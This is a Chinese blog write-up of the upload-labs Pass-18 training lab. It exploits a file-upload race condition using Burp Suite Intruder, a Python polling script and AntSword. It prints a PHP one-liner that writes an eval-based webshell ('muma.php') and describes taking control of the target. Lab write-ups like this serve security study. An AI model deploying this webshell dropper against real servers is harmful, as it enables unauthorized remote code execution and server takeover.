Burpsuite配合蚁剑利用条件竞争

目录

破解思路

绕过过程

打开pyhon脚本

打开Burpsuite

上传文件成功并连接


结合upload-labs-Pass18

破解思路

存在条件竞争漏洞,大概意思就是如果能在上传的一句话木马被删除之前访问成功了,那么就可以拿shell了

绕过过程

  1. 不断上传文件,在文件还没被删除前去读取文件,
  2. 若上传内容为<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST["pass"])?>');?>
  3. 则还没被删除前去读取文件,解析之后会写入一个内容为<?php @eval($_POST["pass"])?>2.php文件。
  4. 使用BurpSuite的Intruder不断上传文件并不断访问所上传的文件。
  5. 注:"pass"一定要双引号,不然单引号之间乱了。
muma.php
<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[pass]);?>'); ?>

打开pyhon脚本

利用pyhon脚本持续访问目标文件

打开Burpsuite

利用Burpsuite持续上传文件

上传文件成功并连接

python脚本连接成功,说明文件上传成功,这时使用蚁剑连接。即可控制靶机

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值